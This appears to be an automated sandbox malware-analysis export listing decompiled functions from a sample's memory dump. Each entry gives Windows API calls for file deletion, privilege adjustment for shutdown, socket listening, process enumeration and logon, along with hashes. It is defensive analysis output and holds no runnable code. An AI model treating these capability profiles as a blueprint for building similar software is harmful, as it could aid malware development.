                                                                                                                • API String ID: 713712311-438819550
                                                                                                                • Opcode ID: 96a611decced772e72d74b2eee91395334a9c769f4ef43e0cf7658ee933f139c
                                                                                                                • Instruction ID: 3b4b1e4b82d557da173b081cecc46545246679a538d6ed7ef6f3b97813d26f42
                                                                                                                • Opcode Fuzzy Hash: 96a611decced772e72d74b2eee91395334a9c769f4ef43e0cf7658ee933f139c
                                                                                                                • Instruction Fuzzy Hash: 80413C7190425AAFCF14DF68DC69EEEBBB8FF05314F14446AF819A21A1EB309A44CF51
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4104443479-0
                                                                                                                • Opcode ID: 69c257e97349c85b4bd6f1849c35843fee9471fdc39c14d410b08ba4112121cc
                                                                                                                • Instruction ID: f24d14b32d8fee9592124d8c7f7ac22e8dab3df3041e152444c8e9cd39892b01
                                                                                                                • Opcode Fuzzy Hash: 69c257e97349c85b4bd6f1849c35843fee9471fdc39c14d410b08ba4112121cc
                                                                                                                • Instruction Fuzzy Hash: 8A128A70A00609DFDF04DFA9D991AAEB7F5FF88304F104529E54AE7290EB35AD21CB61
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E4743,?,?,008E37AE,?), ref: 008E4770
                                                                                                                  • Part of subcall function 00944A31: GetFileAttributesW.KERNEL32(?,0094370B), ref: 00944A32
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00943B89
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 00943BD9
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00943BEA
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00943C01
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00943C0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 2649000838-1173974218
                                                                                                                • Opcode ID: 48126040ed200666dda4c76ec4cb354f828551b5bbc62c67125a9c8719598a68
                                                                                                                • Instruction ID: 9e0b08f057f22a183a007f2b14504e5bcbbdd1726efcec771e33330620a3dfd3
                                                                                                                • Opcode Fuzzy Hash: 48126040ed200666dda4c76ec4cb354f828551b5bbc62c67125a9c8719598a68
                                                                                                                • Instruction Fuzzy Hash: 59315E3100C3859BC601EB68D891DAFBBACFE92314F444D2DF4E692191EB21DA08DB53
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009387E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0093882B
                                                                                                                  • Part of subcall function 009387E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00938858
                                                                                                                  • Part of subcall function 009387E1: GetLastError.KERNEL32 ref: 00938865
                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 009451F9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                • String ID: $@$SeShutdownPrivilege
                                                                                                                • API String ID: 2234035333-194228
                                                                                                                • Opcode ID: 8eb34152bd8c2f47ee9d6216700d0c54379234ec7271fc971094b21b61e49d77
                                                                                                                • Instruction ID: bfeef05c9d0cafd5af81090216372ad47f59642eec76a3eb219e6d7a9f50f6c1
                                                                                                                • Opcode Fuzzy Hash: 8eb34152bd8c2f47ee9d6216700d0c54379234ec7271fc971094b21b61e49d77
                                                                                                                • Instruction Fuzzy Hash: C2014E317A56116BFB2866F8AC9BFBB725CDB05750F220826F933E20D3DAD15C00C690
                                                                                                                APIs
                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009562DC
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 009562EB
                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00956307
                                                                                                                • listen.WSOCK32(00000000,00000005), ref: 00956316
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00956330
                                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00956344
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279440585-0
                                                                                                                • Opcode ID: 92eef5be44a7e147ecb113a30ee276642c4c6bcece986caa60d40ea80f90b78f
                                                                                                                • Instruction ID: e8ff8c5b1b829aada962db27aaa0398563b1a62dd81a8a06e17fa46d4d8c9948
                                                                                                                • Opcode Fuzzy Hash: 92eef5be44a7e147ecb113a30ee276642c4c6bcece986caa60d40ea80f90b78f
                                                                                                                • Instruction Fuzzy Hash: 1B21D031600210AFCB00EF69D849B6EB7A9FF89321F548168FC56E73A1CBB0AD05DB51
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00900DB6: std::exception::exception.LIBCMT ref: 00900DEC
                                                                                                                  • Part of subcall function 00900DB6: __CxxThrowException@8.LIBCMT ref: 00900E01
                                                                                                                • _memmove.LIBCMT ref: 00930258
                                                                                                                • _memmove.LIBCMT ref: 0093036D
                                                                                                                • _memmove.LIBCMT ref: 00930414
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 1300846289-0
                                                                                                                • Opcode ID: 81656df518a5eee7a3042ccd8eafea61ea4dbc387c1361c5fd960561490da342
                                                                                                                • Instruction ID: 0b24cbf5027fcd9f4c60d71bf1597fe7d77ed981d37e700acf15b2183ae68d9f
                                                                                                                • Opcode Fuzzy Hash: 81656df518a5eee7a3042ccd8eafea61ea4dbc387c1361c5fd960561490da342
                                                                                                                • Instruction Fuzzy Hash: B202AF70A00609DFCF04DF69D991ABEBBB5FF84300F148469E90ADB295EB35DA50CB91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E2612: GetWindowLongW.USER32(?,000000EB), ref: 008E2623
                                                                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 008E19FA
                                                                                                                • GetSysColor.USER32(0000000F), ref: 008E1A4E
                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 008E1A61
                                                                                                                  • Part of subcall function 008E1290: DefDlgProcW.USER32(?,00000020,?), ref: 008E12D8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ColorProc$LongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3744519093-0
                                                                                                                • Opcode ID: a640b1a802ad9ad1fa0cbc7f3b84936573a63daeb365c26390eaa88c43ed9a5c
                                                                                                                • Instruction ID: 2aa27cfad2f7a3cea8cd6b16eb47a9cd7e96db6bcf8705e68ba7045e7e2b01d4
                                                                                                                • Opcode Fuzzy Hash: a640b1a802ad9ad1fa0cbc7f3b84936573a63daeb365c26390eaa88c43ed9a5c
                                                                                                                • Instruction Fuzzy Hash: CAA15DB03165ECBADF24AB2B8C4CEBF359EFF87749B150129F502D5192CA349D4192B2
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0094BCE6
                                                                                                                • _wcscmp.LIBCMT ref: 0094BD16
                                                                                                                • _wcscmp.LIBCMT ref: 0094BD2B
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0094BD3C
                                                                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0094BD6C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 2387731787-0
                                                                                                                • Opcode ID: 1e7c3dcf91c92bebdf126cac18681fb136bb87e76f60f1354d19f8fd352b51f4
                                                                                                                • Instruction ID: bdde01a2e2f6a047d5d3a460befb9db59090b59d01a96ac55c01ff91496ee009
                                                                                                                • Opcode Fuzzy Hash: 1e7c3dcf91c92bebdf126cac18681fb136bb87e76f60f1354d19f8fd352b51f4
                                                                                                                • Instruction Fuzzy Hash: 31518D75A046029FC714DF68D490E9AB3E8FF4A324F10496DF96A8B3A1DB70ED04CB91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00957D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00957DB6
                                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0095679E
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 009567C7
                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00956800
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0095680D
                                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00956821
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 99427753-0
                                                                                                                • Opcode ID: 554378833039d7244e72d841fb59ede9991ce04cd89104776528c48e13c89204
                                                                                                                • Instruction ID: fffb0e9e6bbc65cbc454da580954ce27086aefc24573f227ac2c3001cc0d8fd2
                                                                                                                • Opcode Fuzzy Hash: 554378833039d7244e72d841fb59ede9991ce04cd89104776528c48e13c89204
                                                                                                                • Instruction Fuzzy Hash: 6341D675700214AFDB50EF299C86F2E77A8EF4A714F44846CF959EB3D2CAB09D008792
                                                                                                                APIs
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                • String ID:
                                                                                                                • API String ID: 292994002-0
                                                                                                                • Opcode ID: 3389d92c4556afad8b56b9c21d7bab76030386e50ab795499bb85abcb1144b58
                                                                                                                • Instruction ID: e0e0bc504cbe91389dab15003afffd40d40f451739ccf8ca84cadc453855106d
                                                                                                                • Opcode Fuzzy Hash: 3389d92c4556afad8b56b9c21d7bab76030386e50ab795499bb85abcb1144b58
                                                                                                                • Instruction Fuzzy Hash: 7011B231300915ABDB216F26DC54E6B7B9CFF85BA1F428439F846D7351CBB09D018AA5
                                                                                                                APIs
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009380C0
                                                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009380CA
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009380D9
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009380E0
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009380F6
                                                                                                                Similarity
                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 44706859-0
                                                                                                                • Opcode ID: c04d873043f59418caa7538961090e2c968be3b743d17982c7d60584dbcd2f35
                                                                                                                • Instruction ID: 37b1e2089980d0158d78a3afa0a60b2d6b3b87ad1416bdf5c7970327708cee7e
                                                                                                                • Opcode Fuzzy Hash: c04d873043f59418caa7538961090e2c968be3b743d17982c7d60584dbcd2f35
                                                                                                                • Instruction Fuzzy Hash: 28F0627126C304AFEB100FA5EC9DE673BACFF8A795F000029F945C6150CBA19C41EE60
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 0094C432
                                                                                                                • CoCreateInstance.OLE32(00972D6C,00000000,00000001,00972BDC,?), ref: 0094C44A
                                                                                                                  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
                                                                                                                • CoUninitialize.OLE32 ref: 0094C6B7
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                • String ID: .lnk
                                                                                                                • API String ID: 2683427295-24824748
                                                                                                                • Opcode ID: eebe7cdba0307a38e6f7d658a909316b5b812eb03593deadcc61bc7e73445b2f
                                                                                                                • Instruction ID: c5faac222a7b92cf54e86b11212b5bf940c3c33838f6c74daaabc26b9f306ae2
                                                                                                                • Opcode Fuzzy Hash: eebe7cdba0307a38e6f7d658a909316b5b812eb03593deadcc61bc7e73445b2f
                                                                                                                • Instruction Fuzzy Hash: 91A12AB1104245AFD700EF59C891EABB7A8FF86354F00492CF199D71A2DB71AA09CB63
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,008E4AD0), ref: 008E4B45
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008E4B57
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                • API String ID: 2574300362-192647395
                                                                                                                • Opcode ID: f7027ce2694836b10f26b25d603bca38fe14da7e6e4fc00d3905ca0bda5670dc
                                                                                                                • Instruction ID: 3ec9525df1f4e920528f6203c7c07a3955ec6fc1fbf88f31087a8aa7bb845be6
                                                                                                                • Opcode Fuzzy Hash: f7027ce2694836b10f26b25d603bca38fe14da7e6e4fc00d3905ca0bda5670dc
                                                                                                                • Instruction Fuzzy Hash: 0FD01735A24713CFD7209F72F838B0676E4FF863A5B12987ED49AD6150E6B0E880CA54
                                                                                                                Similarity
                                                                                                                • API ID: __itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 674341424-0
                                                                                                                • Opcode ID: 3844651e54407baa505b9fe7707e1634e059d6068176d54b71917f00b7b9f705
                                                                                                                • Instruction ID: dae93d7d00d5aae3600b03f99a0cc3b4b8b13e263c499e4c4c0112b6d4a32bc5
                                                                                                                • Opcode Fuzzy Hash: 3844651e54407baa505b9fe7707e1634e059d6068176d54b71917f00b7b9f705
                                                                                                                • Instruction Fuzzy Hash: 7E2297716083549FC724DF28D881BAAB7E4FF95314F10492DFA9AD7291DB70EA04CB92
                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0095EE3D
                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0095EE4B
                                                                                                                  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 0095EF0B
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0095EF1A
                                                                                                                Similarity
                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 2576544623-0
                                                                                                                • Opcode ID: fa20b51796a722139e41fbc512eeec3ebe5ba439a9c4667f5d4244a519bfc6cd
                                                                                                                • Instruction ID: eaa48b9f0c90e9952bd8729fb0320061ad304802e01efaea7c6d33d7484ebbb9
                                                                                                                • Opcode Fuzzy Hash: fa20b51796a722139e41fbc512eeec3ebe5ba439a9c4667f5d4244a519bfc6cd
                                                                                                                • Instruction Fuzzy Hash: 30516D71508351AFD310EF29DC81E6BBBE8FF95750F40482DF995D62A1EB70A908CB92
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0093E628
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen
                                                                                                                • String ID: ($|
                                                                                                                • API String ID: 1659193697-1631851259
                                                                                                                • Opcode ID: 3a99ba212c5ec43803cea9aaa45fd9010cb494f24e85b445cf872f10d4b291dd
                                                                                                                • Instruction ID: f8a79888f136ef0f4d76818cf336efe3a33c71c952dd4da9d2ef1a203ed75e4b
                                                                                                                • Opcode Fuzzy Hash: 3a99ba212c5ec43803cea9aaa45fd9010cb494f24e85b445cf872f10d4b291dd
                                                                                                                • Instruction Fuzzy Hash: 6B320275A007059FDB28CF19C481AAAB7F5FF48320B15C56EE89ADB3A1E770E941CB44
                                                                                                                APIs
                                                                                                                • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0095180A,00000000), ref: 009523E1
                                                                                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00952418
                                                                                                                Similarity
                                                                                                                • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 599397726-0
                                                                                                                • Opcode ID: 09ec3c5e17d65b3ac200cc6a4eadf14597eb9b915745ab3e7933b533fa99b2c7
                                                                                                                • Instruction ID: 96c88d1058cb7941898fac82b10dfea8ed762969d74f770621eb307a5058368d
                                                                                                                • Opcode Fuzzy Hash: 09ec3c5e17d65b3ac200cc6a4eadf14597eb9b915745ab3e7933b533fa99b2c7
                                                                                                                • Instruction Fuzzy Hash: E941F471904209BFEB10DF96DC81FBB77ACEB82716F10402AFE01A6190EA759E499760
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0094B40B
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0094B465
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0094B4B2
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
APIs
  • Part of subcall function 00900DB6: std::exception::exception.LIBCMT ref: 00900DEC
  • Part of subcall function 00900DB6: __CxxThrowException@8.LIBCMT ref: 00900E01
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0093882B
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00938858
• GetLastError.KERNEL32 ref: 00938865
Similarity
• API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
• String ID:
• API String ID: 1922334811-0
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00938774
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0093878B
• FreeSid.ADVAPI32(?), ref: 0093879B
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0094C6FB
• FindClose.KERNEL32(00000000), ref: 0094C72B
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00959468,?,0096FB84,?), ref: 0094A097
• FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00959468,?,0096FB84,?), ref: 0094A0A9
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00938309), ref: 009381E0
• CloseHandle.KERNEL32(?,?,00938309), ref: 009381F2
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,00908D57,?,?,?,00000001), ref: 0090A15A
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0090A163
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
                                                                                                                APIs
                                                                                                                • __time64.LIBCMT ref: 0094889B
                                                                                                                  • Part of subcall function 0090520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00948F6E,00000000,?,?,?,?,0094911F,00000000,?), ref: 00905213
                                                                                                                  • Part of subcall function 0090520A: __aulldiv.LIBCMT ref: 00905233
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                • String ID:
                                                                                                                • API String ID: 2893107130-0
                                                                                                                • Opcode ID: 60293b6e6ecfd0efdf249093da9bb2d0a9945a33ba6d644bcf828fa45f0926d7
                                                                                                                • Instruction ID: 336905572dabdf3967851ecc8be5e39516b6eb697aa7ff75b301cd881b52264a
                                                                                                                • Opcode Fuzzy Hash: 60293b6e6ecfd0efdf249093da9bb2d0a9945a33ba6d644bcf828fa45f0926d7
                                                                                                                • Instruction Fuzzy Hash: 0921B432A356108BC729CF29D841A52B3E5EFA5311B698E6CE1F5CB2C0CA34B905DB94
APIs
• mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00944C4A
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: mouse_event
• String ID:
• API String ID: 2434400541-0
• Opcode ID: 93e86d91ae76ec93caee3f6daddf90d16df70b409774b3fa54b8a7a852e9bcbe
• Instruction ID: 0bffb5f88280b283c047ac7a60b391c26def0fef5774b5b1c5c5894a3ed59af4
• Opcode Fuzzy Hash: 93e86d91ae76ec93caee3f6daddf90d16df70b409774b3fa54b8a7a852e9bcbe
• Instruction Fuzzy Hash: 53D05E9116960938FC2C07209E5FFFA010CE340783FD8854971828A0C2ECC49C406531
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00938389), ref: 009387D1
